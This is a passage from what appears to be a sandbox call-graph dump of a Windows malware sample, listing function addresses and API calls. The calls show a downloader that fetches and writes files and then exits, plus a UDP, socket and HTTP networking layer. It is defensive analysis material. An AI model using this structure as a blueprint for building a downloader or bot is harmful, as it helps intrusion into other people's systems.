4582 408850 GetCurrentProcessId 4537->4582 4539 408c7b 4540 408c82 4539->4540 4583 408870 4539->4583 4540->4489 4543 408c97 HeapFree 4543->4540 4553 408850 GetCurrentProcessId 4544->4553 4546 408a6b 4547 408a77 __aligned_recalloc_base 4546->4547 4554 4089c0 4546->4554 4549 408aec 4547->4549 4550 408a92 RtlAllocateHeap 4547->4550 4549->4468 4549->4529 4550->4549 4551 408ab9 __aligned_recalloc_base 4550->4551 4551->4549 4552 408ad4 memset 4551->4552 4552->4549 4553->4546 4562 408850 GetCurrentProcessId 4554->4562 4556 4089c9 4557 4089e6 HeapCreate 4556->4557 4563 408930 GetProcessHeaps 4556->4563 4559 408a00 HeapSetInformation GetCurrentProcessId 4557->4559 4560 408a27 4557->4560 4559->4560 4560->4547 4562->4556 4564 408961 4563->4564 4564->4557 4564->4560 4566 408a60 __aligned_recalloc_base 7 API calls 4565->4566 4567 40100b 4566->4567 4568 401400 4567->4568 4569 40140a 4568->4569 4570 408b20 __aligned_recalloc_base 7 API calls 4569->4570 4571 401018 4570->4571 4571->4477 4573 40110e 4572->4573 4575 4010d1 4572->4575 4574 408b20 __aligned_recalloc_base 7 API calls 4573->4574 4573->4575 4578 401132 _invalid_parameter 4574->4578 4575->4536 4576 401162 memcpy 4577 401186 _invalid_parameter 4576->4577 4580 408c70 _invalid_parameter 3 API calls 4577->4580 4578->4576 4579 408c70 _invalid_parameter 3 API calls 4578->4579 4581 40115f 4579->4581 4580->4575 4581->4576 4582->4539 4584 4088a0 HeapValidate 4583->4584 4585 4088c0 4583->4585 4584->4585 4585->4540 4585->4543 4602 408ce0 4586->4602 4589 40b251 4589->4385 4592 408c70 _invalid_parameter 3 API calls 4592->4589 4810 408b60 4593->4810 4596 4045d1 4596->4385 4597 408ce0 8 API calls 4598 40454b 4597->4598 4820 40ab80 4598->4820 4603 408d0d 4602->4603 4604 408b20 __aligned_recalloc_base 7 API calls 4603->4604 4605 408d22 4603->4605 4606 408d24 memcpy 4603->4606 4604->4603 4605->4589 4607 40a720 4605->4607 4606->4603 4610 40a72c 4607->4610 4611 40a788 4610->4611 4613 408c70 _invalid_parameter 3 API calls 4610->4613 4614 40a74b 4610->4614 4615 40ac70 4610->4615 4629 4065e0 4610->4629 4612 408c70 _invalid_parameter 3 API calls 4611->4612 4612->4614 4613->4610 4614->4589 4614->4592 4617 40ac7f __aligned_recalloc_base 4615->4617 4616 40ac89 4616->4610 4617->4616 4618 408b20 __aligned_recalloc_base 7 API calls 4617->4618 4619 40ad18 4618->4619 4619->4616 4620 401000 7 API calls 4619->4620 4621 40ad2d 4620->4621 4622 401000 7 API calls 4621->4622 4624 40ad35 4622->4624 4625 40ad8d __aligned_recalloc_base 4624->4625 4632 40ac10 4624->4632 4637 401050 4625->4637 4628 401050 3 API calls 4628->4616 4745 4087d0 4629->4745 4633 4011e0 10 API calls 4632->4633 4634 40ac24 4633->4634 4643 4013e0 4634->4643 4636 40ac3c 4636->4624 4638 4010ae 4637->4638 4640 401064 _invalid_parameter 4637->4640 4638->4628 4639 408c70 _invalid_parameter 3 API calls 4639->4638 4641 408c70 _invalid_parameter 3 API calls 4640->4641 4642 40108c 4640->4642 4641->4642 4642->4639 4646 4012d0 4643->4646 4645 4013fa 4645->4636 4647 4012e4 4646->4647 4648 4010c0 __aligned_recalloc_base 10 API calls 4647->4648 4649 40132d 4648->4649 4650 4010c0 __aligned_recalloc_base 10 API calls 4649->4650 4651 40133d 4650->4651 4652 4010c0 __aligned_recalloc_base 10 API calls 4651->4652 4653 40134d 4652->4653 4654 4010c0 __aligned_recalloc_base 10 API calls 4653->4654 4655 40135d 4654->4655 4656 401366 4655->4656 4657 40138f 4655->4657 4661 402c20 4656->4661 4678 4029d0 4657->4678 4660 401387 _invalid_parameter 4660->4645 4662 401400 _invalid_parameter 7 API calls 4661->4662 4663 402c37 4662->4663 4664 401400 _invalid_parameter 7 API calls 4663->4664 4665 402c46 4664->4665 4666 401400 _invalid_parameter 7 API calls 4665->4666 4667 402c55 4666->4667 4668 401400 _invalid_parameter 7 API calls 4667->4668 4670 402c64 _invalid_parameter 4668->4670 4671 402e0f _invalid_parameter 4670->4671 4681 401430 4670->4681 4672 401430 _invalid_parameter 3 API calls 4671->4672 4674 402e35 _invalid_parameter 4671->4674 4672->4671 4673 401430 _invalid_parameter 3 API calls 4673->4674 4674->4673 4675 402e5b _invalid_parameter 4674->4675 4676 401430 _invalid_parameter 3 API calls 4675->4676 4677 402e81 4675->4677 4676->4675 4677->4660 4685 402e90 4678->4685 4680 4029ec 4680->4660 4682 40143b 4681->4682 4684 401446 4681->4684 4683 408c70 _invalid_parameter 3 API calls 4682->4683 4683->4684 4684->4670 4686 402ea6 _invalid_parameter 4685->4686 4687 402eb8 _invalid_parameter 4686->4687 4688 402edd 4686->4688 4690 402f03 4686->4690 4687->4680 4715 402880 4688->4715 4691 402f3d 4690->4691 4692 402f5e 4690->4692 4725 402a00 4691->4725 4694 401400 _invalid_parameter 7 API calls 4692->4694 4695 402f6f 4694->4695 4696 401400 _invalid_parameter 7 API calls 4695->4696 4697 402f7e 4696->4697 4698 401400 _invalid_parameter 7 API calls 4697->4698 4699 402f8d 4698->4699 4700 401400 _invalid_parameter 7 API calls 4699->4700 4701 402f9c 4700->4701 4738 402950 4701->4738 4703 401400 _invalid_parameter 7 API calls 4704 402fca _invalid_parameter 4703->4704 4704->4703 4706 403084 _invalid_parameter 4704->4706 4705 401430 _invalid_parameter 3 API calls 4705->4706 4706->4705 4708 4033a3 _invalid_parameter 4706->4708 4707 401430 _invalid_parameter 3 API calls 4707->4708 4708->4707 4709 4033c9 _invalid_parameter 4708->4709 4710 401430 _invalid_parameter 3 API calls 4709->4710 4711 4033ef _invalid_parameter 4709->4711 4710->4709 4712 401430 _invalid_parameter 3 API calls 4711->4712 4713 403415 _invalid_parameter 4711->4713 4712->4711 4713->4687 4714 401430 _invalid_parameter 3 API calls 4713->4714 4714->4713 4716 40288e 4715->4716 4717 401400 _invalid_parameter 7 API calls 4716->4717 4718 4028ab 4717->4718 4719 401400 _invalid_parameter 7 API calls 4718->4719 4720 4028ba _invalid_parameter 4719->4720 4721 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4720->4721 4722 40291a _invalid_parameter 4720->4722 4721->4720 4723 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4722->4723 4724 402940 4722->4724 4723->4722 4724->4687 4726 401400 _invalid_parameter 7 API calls 4725->4726 4727 402a17 4726->4727 4728 401400 _invalid_parameter 7 API calls 4727->4728 4729 402a26 4728->4729 4730 401400 _invalid_parameter 7 API calls 4729->4730 4737 402a35 _invalid_parameter 4730->4737 4731 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4731->4737 4732 402bc1 _invalid_parameter 4733 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4732->4733 4734 402be7 _invalid_parameter 4732->4734 4733->4732 4735 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4734->4735 4736 402c0d 4734->4736 4735->4734 4736->4687 4737->4731 4737->4732 4739 401400 _invalid_parameter 7 API calls 4738->4739 4740 40295f _invalid_parameter 4739->4740 4741 402880 _invalid_parameter 9 API calls 4740->4741 4743 402998 _invalid_parameter 4741->4743 4742 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4742->4743 4743->4742 4744 4029c3 4743->4744 4744->4704 4746 4087e2 4745->4746 4749 408730 4746->4749 4750 408b20 __aligned_recalloc_base 7 API calls 4749->4750 4756 408740 4750->4756 4751 4065ff 4751->4610 4753 40877c 4755 408c70 _invalid_parameter 3 API calls 4753->4755 4755->4751 4756->4751 4756->4753 4758 407c70 4756->4758 4765 408250 4756->4765 4770 408620 4756->4770 4759 407c83 4758->4759 4764 407c79 4758->4764 4760 407cc6 memset 4759->4760 4759->4764 4761 407ce7 4760->4761 4760->4764 4762 407ced memcpy 4761->4762 4761->4764 4778 407a40 4762->4778 4764->4756 4766 40825d 4765->4766 4767 408267 4765->4767 4766->4756 4767->4766 4768 40835f memcpy 4767->4768 4783 407f90 4767->4783 4768->4767 4771 408636 4770->4771 4776 40862c 4770->4776 4772 407f90 57 API calls 4771->4772 4771->4776 4773 4086b7 4772->4773 4774 407a40 6 API calls 4773->4774 4773->4776 4775 4086d6 4774->4775 4775->4776 4777 4086eb memcpy 4775->4777 4776->4756 4777->4776 4779 407a8e 4778->4779 4780 407a4e 4778->4780 4779->4764 4780->4779 4782 407980 6 API calls 4780->4782 4782->4780 4784 407fab 4783->4784 4786 407fa1 4783->4786 4784->4786 4789 407dd0 4784->4789 4786->4767 4788 407f90 57 API calls 4788->4786 4790 407ddd 4789->4790 4791 407de7 4789->4791 4790->4786 4790->4788 4791->4790 4792 407e70 4791->4792 4793 407e75 4791->4793 4794 407e58 4791->4794 4800 407730 4792->4800 4798 407a40 6 API calls 4793->4798 4797 407a40 6 API calls 4794->4797 4797->4792 4798->4792 4799 407f1c memset 4799->4790 4801 407749 4800->4801 4809 40773f 4800->4809 4802 407610 6 API calls 4801->4802 4801->4809 4803 407842 4802->4803 4804 408b20 __aligned_recalloc_base 7 API calls 4803->4804 4805 407891 4804->4805 4806 407490 44 API calls 4805->4806 4805->4809 4807 4078be 4806->4807 4808 408c70 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4807->4808 4808->4809 4809->4790 4809->4799 4829 408850 GetCurrentProcessId 4810->4829 4812 408b6b 4813 4089c0 __aligned_recalloc_base 5 API calls 4812->4813 4818 408b77 __aligned_recalloc_base 4812->4818 4813->4818 4814 404507 4814->4596 4814->4597 4815 408c20 HeapAlloc 4815->4818 4816 408bea HeapReAlloc 4816->4818 4817 408870 _invalid_parameter HeapValidate 4817->4818 4818->4814 4818->4815 4818->4816 4818->4817 4819 408c70 _invalid_parameter 3 API calls 4818->4819 4819->4818 4822 40ab8b 4820->4822 4821 408b20 __aligned_recalloc_base 7 API calls 4821->4822 4822->4821 4823 404596 4822->4823 4823->4596 4824 405c90 4823->4824 4825 408b20 __aligned_recalloc_base 7 API calls 4824->4825 4826 405ca0 4825->4826 4827 405ce7 4826->4827 4828 405cac memcpy CreateThread CloseHandle 4826->4828 4827->4596 4828->4827 4830 405bf0 4828->4830 4829->4812 4831 405c01 4830->4831 4832 405c57 4830->4832 4833 405c55 4831->4833 4836 405c10 StrChrA 4831->4836 4840 40d4f0 GetTickCount srand ExpandEnvironmentStringsW 4831->4840 4832->4833 4834 40d4f0 60 API calls 4832->4834 4835 408c70 _invalid_parameter 3 API calls 4833->4835 4834->4833 4837 405c82 4835->4837 4836->4831 4841 40d53e 4840->4841 4841->4841 4842 40d55c mbstowcs rand rand wsprintfW InternetOpenW 4841->4842 4843 40d760 InternetCloseHandle Sleep 4842->4843 4844 40d5f5 InternetOpenUrlW 4842->4844 4847 405c3f Sleep 4843->4847 4848 40d787 6 API calls 4843->4848 4845 40d753 InternetCloseHandle 4844->4845 4846 40d624 CreateFileW 4844->4846 4845->4843 4849 40d653 InternetReadFile 4846->4849 4850 40d746 CloseHandle 4846->4850 4847->4831 4848->4847 4851 40d809 wsprintfW DeleteFileW Sleep 4848->4851 4852 40d6a6 CloseHandle wsprintfW DeleteFileW Sleep 4849->4852 4853 40d677 4849->4853 4850->4845 4854 40d1d0 20 API calls 4851->4854 4871 40d1d0 CreateFileW 4852->4871 4853->4852 4857 40d680 WriteFile 4853->4857 4856 40d849 4854->4856 4859 40d853 Sleep 4856->4859 4860 40d887 DeleteFileW 4856->4860 4857->4849 4863 40d390 5 API calls 4859->4863 4860->4847 4861 40d739 DeleteFileW 4861->4850 4862 40d6fd Sleep 4864 40d390 5 API calls 4862->4864 4865 40d86a 4863->4865 4866 40d714 4864->4866 4865->4847 4869 40d87d ExitProcess 4865->4869 4867 40d730 4866->4867 4868 40d71f 4866->4868 4867->4850 4868->4867 4870 40d728 ExitProcess 4868->4870 4872 40d323 4871->4872 4873 40d217 CreateFileMappingW 4871->4873 4876 40d329 CreateFileW 4872->4876 4877 40d37a 4872->4877 4874 40d238 MapViewOfFile 4873->4874 4875 40d319 CloseHandle 4873->4875 4878 40d257 GetFileSize 4874->4878 4879 40d30f CloseHandle 4874->4879 4875->4872 4880 40d371 4876->4880 4881 40d34b WriteFile CloseHandle 4876->4881 4877->4861 4877->4862 4882 40d273 4878->4882 4883 40d305 UnmapViewOfFile 4878->4883 4879->4875 4884 408c70 _invalid_parameter 3 API calls 4880->4884 4881->4880 4891 40b1e0 4882->4891 4883->4879 4884->4877 4887 40ab80 7 API calls 4888 40d2be 4887->4888 4888->4883 4889 408c70 _invalid_parameter 3 API calls 4888->4889 4890 40d2fb 4889->4890 4890->4883 4892 40ac70 10 API calls 4891->4892 4893 40b204 4892->4893 4893->4883 4893->4887 4895 40c6de 4894->4895 4896 40c5ad htons inet_addr setsockopt 4894->4896 4895->4392 4897 409540 8 API calls 4896->4897 4898 40c626 bind lstrlenA sendto ioctlsocket 4897->4898 4899 40c67b 4898->4899 4900 40c6a2 4899->4900 4903 408b60 9 API calls 4899->4903 4942 40c490 4899->4942 4951 409600 shutdown closesocket 4900->4951 4903->4899 4958 40c260 memset InternetCrackUrlA InternetOpenA 4904->4958 4907 40cd4e 4907->4392 4909 408c70 _invalid_parameter 3 API calls 4909->4907 4913 40cd1b 4913->4909 4916 40cd11 SysFreeString 4916->4913 5065 409500 inet_addr 4919->5065 4922 4095ed 4927 40cfa0 4922->4927 4923 40959c connect 4924 4095b0 getsockname 4923->4924 4925 4095e4 4923->4925 4924->4925 5068 409600 shutdown closesocket 4925->5068 5069 4094e0 inet_ntoa 4927->5069 4929 40cfb6 4930 40b3e0 11 API calls 4929->4930 4931 40cfd5 4930->4931 4932 40d018 4931->4932 5070 40cd60 memset InternetCrackUrlA InternetOpenA 4931->5070 4932->4397 4935 40d00c 4936 408c70 _invalid_parameter 3 API calls 4935->4936 4936->4932 4937 408c70 _invalid_parameter 3 API calls 4937->4935 4941 408d94 4938->4941 4939 408d9a 4939->4388 4940 408c70 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 4940->4941 4941->4939 4941->4940 4950 40c4ac 4942->4950 4943 40c574 4943->4899 4944 40c4c8 recvfrom 4945 40c4f6 StrCmpNIA 4944->4945 4946 40c4e9 Sleep 4944->4946 4947 40c515 StrStrIA 4945->4947 4945->4950 4946->4950 4948 40c536 StrChrA 4947->4948 4947->4950 4952 40b290 4948->4952 4950->4943 4950->4944 4951->4895 4953 40b29b 4952->4953 4954 40b2a1 lstrlenA 4953->4954 4955 40b2b4 4953->4955 4956 408b20 __aligned_recalloc_base 7 API calls 4953->4956 4957 40b2d0 memcpy 4953->4957 4954->4953 4954->4955 4955->4950 4956->4953 4957->4953 4957->4955 4959 40c301 InternetConnectA 4958->4959 4960 40c477 4958->4960 4961 40c46a InternetCloseHandle 4959->4961 4962 40c33a HttpOpenRequestA 4959->4962 4960->4907 4971 40c000 4960->4971 4961->4960 4963 40c370 HttpSendRequestA 4962->4963 4964 40c45d InternetCloseHandle 4962->4964 4965 40c450 InternetCloseHandle 4963->4965 4967 40c38d 4963->4967 4964->4961 4965->4964 4966 40c3ae InternetReadFile 4966->4967 4968 40c3db 4966->4968 4967->4966 4967->4968 4969 408b60 9 API calls 4967->4969 4968->4965 4970 40c3f6 memcpy 4969->4970 4970->4967 5000 403fb0 4971->5000 4974 40c100 4974->4913 4981 40cbe0 4974->4981 4975 40c02a SysAllocString 4976 40c041 CoCreateInstance 4975->4976 4977 40c0f7 4975->4977 4978 40c0ed SysFreeString 4976->4978 4980 40c066 4976->4980 4979 408c70 _invalid_parameter 3 API calls 4977->4979 4978->4977 4979->4974 4980->4978 5017 40c110 4981->5017 4984 40cac0 5022 40c8e0 4984->5022 4989 40ca40 6 API calls 4990 40cb17 4989->4990 4996 40cb69 4990->4996 5039 40c860 4990->5039 4993 40cb4f 4993->4996 5044 40c200 4993->5044 4994 40c860 6 API calls 4994->4993 4996->4916 4997 40b3e0 4996->4997 5060 40b350 4997->5060 5007 403fbd 5000->5007 5001 403fc3 lstrlenA 5005 403fd6 5001->5005 5001->5007 5003 408b20 __aligned_recalloc_base 7 API calls 5003->5007 5005->4974 5005->4975 5006 408c70 _invalid_parameter 3 API calls 5006->5007 5007->5001 5007->5003 5007->5005 5007->5006 5008 403e90 5007->5008 5012 403f60 5007->5012 5009 403ea7 MultiByteToWideChar 5008->5009 5010 403e9a lstrlenA 5008->5010 5011 403ecc 5009->5011 5010->5009 5011->5007 5015 403f6b 5012->5015 5013 403f71 lstrlenA 5013->5015 5014 403e90 2 API calls 5014->5015 5015->5013 5015->5014 5016 403fa7 5015->5016 5016->5007 5018 40c136 5017->5018 5019 40c1db 5018->5019 5020 40c1b3 lstrcmpiW 5018->5020 5021 40c1cb SysFreeString 5018->5021 5019->4913 5019->4984 5020->5018 5020->5021 5021->5018 5024 40c906 5022->5024 5023 40ca1d 5023->4996 5034 40ca40 5023->5034 5024->5023 5025 40c993 lstrcmpiW 5024->5025 5026 40ca13 SysFreeString 5025->5026 5027 40c9a6 5025->5027 5026->5023 5028 40c200 2 API calls 5027->5028 5029 40c9b4 5028->5029 5029->5026 5030 40ca05 5029->5030 5031 40c9e3 lstrcmpiW 5029->5031 5030->5026 5032 40c9f5 5031->5032 5033 40c9fb SysFreeString 5031->5033 5032->5033 5033->5030 5035 40c200 2 API calls 5034->5035 5037 40ca5b 5035->5037 5036 40ca97 5036->4989 5036->4996 5037->5036 5038 40c8e0 6 API calls 5037->5038 5038->5036 5040 40c200 2 API calls 5039->5040 5042 40c87b 5040->5042 5041 40c8b7 5041->4993 5041->4994 5042->5041 5048 40c700 5042->5048 5045 40c226 5044->5045 5046 40c23d 5045->5046 5047 40c110 2 API calls 5045->5047 5046->4996 5047->5046 5049 40c726 5048->5049 5050 40c83d 5049->5050 5051 40c7b3 lstrcmpiW 5049->5051 5050->5041 5052 40c833 SysFreeString 5051->5052 5053 40c7c6 5051->5053 5052->5050 5054 40c200 2 API calls 5053->5054 5056 40c7d4 5054->5056 5055 40c825 5055->5052 5056->5052 5056->5055 5057 40c803 lstrcmpiW 5056->5057 5058 40c815 5057->5058 5059 40c81b SysFreeString 5057->5059 5058->5059 5059->5055 5062 40b35d 5060->5062 5061 40b300 _vscprintf wvsprintfA 5061->5062 5062->5061 5063 408b60 9 API calls 5062->5063 5064 40b378 SysFreeString 5062->5064 5063->5062 5064->4916 5066 40952c socket 5065->5066 5067 409519 gethostbyname 5065->5067 5066->4922 5066->4923 5067->5066 5068->4922 5069->4929 5071 40cf91 5070->5071 5072 40ce04 InternetConnectA 5070->5072 5071->4935 5071->4937 5073 40cf84 InternetCloseHandle 5072->5073 5074 40ce3d HttpOpenRequestA 5072->5074 5073->5071 5075 40ce73 HttpAddRequestHeadersA HttpSendRequestA 5074->5075 5076 40cf77 InternetCloseHandle 5074->5076 5077 40cf6a InternetCloseHandle 5075->5077 5080 40cebd 5075->5080 5076->5073 5077->5076 5078 40ced4 InternetReadFile 5079 40cf01 5078->5079 5078->5080 5079->5077 5080->5078 5080->5079 5081 408b60 9 API calls 5080->5081 5082 40cf1c memcpy 5081->5082 5082->5080 5088 405947 5083->5088 5084 405b1b 5086 405b24 SysFreeString 5084->5086 5087 405b2e SysFreeString 5084->5087 5085 408c70 _invalid_parameter 3 API calls 5085->5084 5086->5087 5087->4401 5089 4058c0 CoCreateInstance 5088->5089 5090 405a96 SysAllocString 5088->5090 5091 405962 5088->5091 5089->5088 5090->5088 5090->5091 5091->5084 5091->5085 5093 40a8ba 5092->5093 5094 40a8be 5092->5094 5093->4407 5096 40a870 CryptAcquireContextW 5094->5096 5097 40a8ab 5096->5097 5098 40a88d CryptGenRandom CryptReleaseContext 5096->5098 5097->5093 5098->5097 5099->4423 5139 409770 gethostname 5100->5139 5104 409a5c strstr 5105 409a6c 5104->5105 5106 409aad 5104->5106 5154 4094e0 inet_ntoa 5105->5154 5143 4094e0 inet_ntoa 5106->5143 5109 409abb strstr 5111 409acb 5109->5111 5112 409b0c EnterCriticalSection 5109->5112 5110 409a7a strstr 5113 409a49 5110->5113 5114 409a8a 5110->5114 5156 4094e0 inet_ntoa 5111->5156 5116 409b24 5112->5116 5113->4423 5155 4094e0 inet_ntoa 5114->5155 5124 409b4f 5116->5124 5158 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5116->5158 5118 409ad9 strstr 5118->5113 5120 409ae9 5118->5120 5119 409a98 strstr 5119->5106 5119->5113 5157 4094e0 inet_ntoa 5120->5157 5123 409c48 LeaveCriticalSection 5123->5113 5124->5123 5126 408b00 7 API calls 5124->5126 5125 409af7 strstr 5125->5112 5125->5113 5127 409b93 5126->5127 5127->5123 5144 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5127->5144 5129 409bb1 5130 409bd3 Sleep 5129->5130 5131 409bdd 5129->5131 5133 409c03 5129->5133 5130->5129 5132 408c70 _invalid_parameter 3 API calls 5131->5132 5132->5133 5133->5123 5145 409660 5133->5145 5136 409660 14 API calls 5135->5136 5137 409763 LeaveCriticalSection 5136->5137 5137->4428 5138->4436 5140 409797 gethostbyname 5139->5140 5141 4097b3 5139->5141 5140->5141 5141->5113 5142 4094e0 inet_ntoa 5141->5142 5142->5104 5143->5109 5144->5129 5146 409674 5145->5146 5153 40966f 5145->5153 5147 408b20 __aligned_recalloc_base 7 API calls 5146->5147 5149 409688 5147->5149 5148 4096e4 CreateFileW 5150 409733 InterlockedExchange 5148->5150 5151 409707 WriteFile FlushFileBuffers CloseHandle 5148->5151 5149->5148 5149->5153 5152 408c70 _invalid_parameter 3 API calls 5150->5152 5151->5150 5152->5153 5153->5123 5154->5110 5155->5119 5156->5118 5157->5125 5158->5124 5163 40bb2d 5159->5163 5160 40bb91 5160->4442 5160->4443 5161 40bb51 WaitForSingleObject 5162 40bb6c CloseHandle 5161->5162 5161->5163 5162->5163 5163->5160 5163->5161 5165 409623 WaitForSingleObject 5164->5165 5166 409651 5165->5166 5167 40963b InterlockedDecrement 5165->5167 5168 40964a 5167->5168 5168->5165 5169 409750 16 API calls 5168->5169 5169->5168 5228 40ec90 5170->5228 5173 40bae0 5174 40bac7 WaitForSingleObject 5232 40e0e0 5174->5232 5177 40b8a4 5176->5177 5179 40b8c0 WaitForSingleObject 5177->5179 5180 40b8e5 5177->5180 5300 409c80 EnterCriticalSection 5177->5300 5305 40b700 InterlockedExchangeAdd 5177->5305 5179->5177 5179->5180 5183 40e5a9 5182->5183 5184 40e42d WSAWaitForMultipleEvents 5182->5184 5185 40e4d0 GetTickCount 5184->5185 5186 40e44a WSAEnumNetworkEvents 5184->5186 5187 40e523 GetTickCount 5185->5187 5188 40e4e5 EnterCriticalSection 5185->5188 5186->5185 5201 40e463 5186->5201 5189 40e595 WaitForSingleObject 5187->5189 5190 40e52e EnterCriticalSection 5187->5190 5191 40e4f6 5188->5191 5192 40e51a LeaveCriticalSection 5188->5192 5189->5183 5189->5184 5194 40e581 LeaveCriticalSection GetTickCount 5190->5194 5195 40e53f InterlockedExchangeAdd 5190->5195 5198 40e509 LeaveCriticalSection 5191->5198 5509 40e300 5191->5509 5192->5189 5193 40e472 accept 5193->5185 5193->5201 5194->5189 5519 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5195->5519 5198->5189 5200 40e552 5200->5194 5200->5195 5520 409600 shutdown closesocket 5200->5520 5201->5185 5201->5193 5203 40e4c9 5201->5203 5481 40df90 5201->5481 5501 40e7d0 5203->5501 5534 40dd70 5205->5534 5207 40bf1e 5208 40bf9d 5207->5208 5209 409c80 5 API calls 5207->5209 5210 40bf38 InterlockedExchangeAdd 5207->5210 5211 40bf7c WaitForSingleObject 5207->5211 5213 40a0b0 18 API calls 5207->5213 5209->5207 5210->5207 5210->5211 5211->5207 5212 40bf95 5211->5212 5547 40dd00 5212->5547 5213->5207 5586 40d8a0 5215->5586 5217 40bfc7 5218 40bff1 5217->5218 5219 40bfd8 WaitForSingleObject 5217->5219 5220 40dd00 8 API calls 5219->5220 5220->5218 5222 40ea72 5221->5222 5227 40eae8 5221->5227 5223 40ea77 WSAGetOverlappedResult 5222->5223 5601 40e840 5222->5601 5223->5222 5224 40ea99 WSAGetLastError 5223->5224 5224->5222 5226 40eab3 GetQueuedCompletionStatus 5226->5222 5226->5227 5229 40bab6 5228->5229 5230 40ec97 5228->5230 5229->5173 5229->5174 5230->5229 5253 40eb00 5230->5253 5233 40e212 5232->5233 5234 40e0e8 5232->5234 5233->5173 5234->5233 5235 40e0f4 EnterCriticalSection 5234->5235 5236 40e190 LeaveCriticalSection SetEvent 5235->5236 5241 40e10b 5235->5241 5237 40e1c3 5236->5237 5238 40e1ab 5236->5238 5281 40bc90 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 5237->5281 5239 40e1b1 PostQueuedCompletionStatus 5238->5239 5239->5237 5239->5239 5241->5236 5242 40e11c InterlockedDecrement 5241->5242 5244 40e135 InterlockedExchangeAdd 5241->5244 5250 40e17b InterlockedDecrement 5241->5250 5242->5241 5243 40e1ce 5290 40bdd0 5243->5290 5244->5241 5246 40e148 InterlockedIncrement 5244->5246 5275 40e730 WSARecv 5246->5275 5250->5241 5251 40e1ff DeleteCriticalSection 5252 408c70 _invalid_parameter 3 API calls 5251->5252 5252->5233 5254 408b00 7 API calls 5253->5254 5255 40eb0b 5254->5255 5256 40ec86 5255->5256 5257 40eb18 GetSystemInfo InitializeCriticalSection CreateEventA 5255->5257 5256->5229 5258 40eb56 CreateIoCompletionPort 5257->5258 5259 40ec7f 5257->5259 5258->5259 5260 40eb6f 5258->5260 5261 40e0e0 36 API calls 5259->5261 5262 40baf0 8 API calls 5260->5262 5263 40ec84 5261->5263 5264 40eb74 5262->5264 5263->5256 5264->5259 5265 40eb7f WSASocketA 5264->5265 5265->5259 5266 40eb9d setsockopt htons bind 5265->5266 5266->5259 5267 40ec06 listen 5266->5267 5267->5259 5268 40ec1a WSACreateEvent 5267->5268 5268->5259 5269 40ec27 WSAEventSelect 5268->5269 5269->5259 5270 40ec39 5269->5270 5271 40ec5f 5270->5271 5272 40bba0 301 API calls 5270->5272 5273 40bba0 301 API calls 5271->5273 5272->5270 5274 40ec74 5273->5274 5274->5229 5276 40e7b2 5275->5276 5277 40e76e 5275->5277 5276->5241 5278 40e770 WSAGetLastError 5277->5278 5279 40e784 Sleep WSARecv 5277->5279 5280 40e7bb 5277->5280 5278->5276 5278->5277 5279->5276 5279->5278 5280->5241 5282 40bcc6 InterlockedExchangeAdd 5281->5282 5283 40bda9 GetCurrentThread SetThreadPriority 5281->5283 5282->5283 5289 40bce0 5282->5289 5283->5243 5284 40bcf9 EnterCriticalSection 5284->5289 5285 40bd67 LeaveCriticalSection 5287 40bd7e 5285->5287 5285->5289 5286 40bd43 WaitForSingleObject 5286->5289 5287->5283 5288 40bd9c Sleep 5288->5289 5289->5283 5289->5284 5289->5285 5289->5286 5289->5287 5289->5288 5291 40bddc EnterCriticalSection 5290->5291 5298 40be52 CloseHandle CloseHandle WSACloseEvent 5290->5298 5294 40bdf8 5291->5294 5292 40be20 LeaveCriticalSection DeleteCriticalSection 5295 408c70 _invalid_parameter 3 API calls 5292->5295 5293 40be0b CloseHandle 5293->5294 5294->5292 5294->5293 5296 40be46 5295->5296 5297 408c70 _invalid_parameter 3 API calls 5296->5297 5297->5298 5299 409600 shutdown closesocket 5298->5299 5299->5251 5301 409cb7 LeaveCriticalSection 5300->5301 5302 409c9f 5300->5302 5301->5177 5303 40a8b0 3 API calls 5302->5303 5304 409caa 5303->5304 5304->5301 5306 40b71d 5305->5306 5316 40b716 5305->5316 5322 40b610 5306->5322 5309 40b73d InterlockedIncrement 5319 40b747 5309->5319 5311 40b770 5347 4094e0 inet_ntoa 5311->5347 5313 40b77c 5314 40b840 InterlockedDecrement 5313->5314 5346 409600 shutdown closesocket 5314->5346 5316->5177 5317 408b20 __aligned_recalloc_base 7 API calls 5317->5319 5318 40b540 6 API calls 5318->5319 5319->5311 5319->5314 5319->5317 5319->5318 5321 408c70 _invalid_parameter 3 API calls 5319->5321 5329 40a0b0 5319->5329 5332 40a210 5319->5332 5321->5319 5323 40b61d socket 5322->5323 5324 40b632 htons connect 5323->5324 5325 40b68f 5323->5325 5324->5325 5326 40b67a 5324->5326 5325->5323 5328 40b683 5325->5328 5348 409600 shutdown closesocket 5326->5348 5328->5309 5328->5316 5349 409ec0 5329->5349 5344 40a221 5332->5344 5334 40a23f 5336 408c70 _invalid_parameter 3 API calls 5334->5336 5337 40a5a4 5336->5337 5337->5319 5338 409f60 25 API calls 5338->5344 5341 40a0b0 18 API calls 5341->5344 5342 409c60 28 API calls 5342->5344 5344->5334 5344->5338 5344->5341 5344->5342 5388 40a130 5344->5388 5395 409cd0 EnterCriticalSection 5344->5395 5400 405860 5344->5400 5405 405790 5344->5405 5408 405820 5344->5408 5413 405730 5344->5413 5346->5316 5347->5313 5348->5328 5350 40a8f0 3 API calls 5349->5350 5351 409ecb 5350->5351 5352 409ee7 lstrlenA 5351->5352 5353 40ab80 7 API calls 5352->5353 5354 409f1d 5353->5354 5355 409f48 5354->5355 5360 40be90 5354->5360 5363 40b4e0 5354->5363 5355->5319 5356 409f3c 5357 408c70 _invalid_parameter 3 API calls 5356->5357 5357->5355 5368 40dbd0 5360->5368 5362 40beb1 5362->5356 5384 40b480 5363->5384 5366 40b50e 5366->5356 5367 40b480 send 5367->5366 5369 40dce3 5368->5369 5370 40dbef 5368->5370 5369->5362 5370->5369 5371 408b20 __aligned_recalloc_base 7 API calls 5370->5371 5372 40dc16 memcpy htons 5371->5372 5373 40dcbc 5372->5373 5374 40dc66 sendto 5372->5374 5377 408c70 _invalid_parameter 3 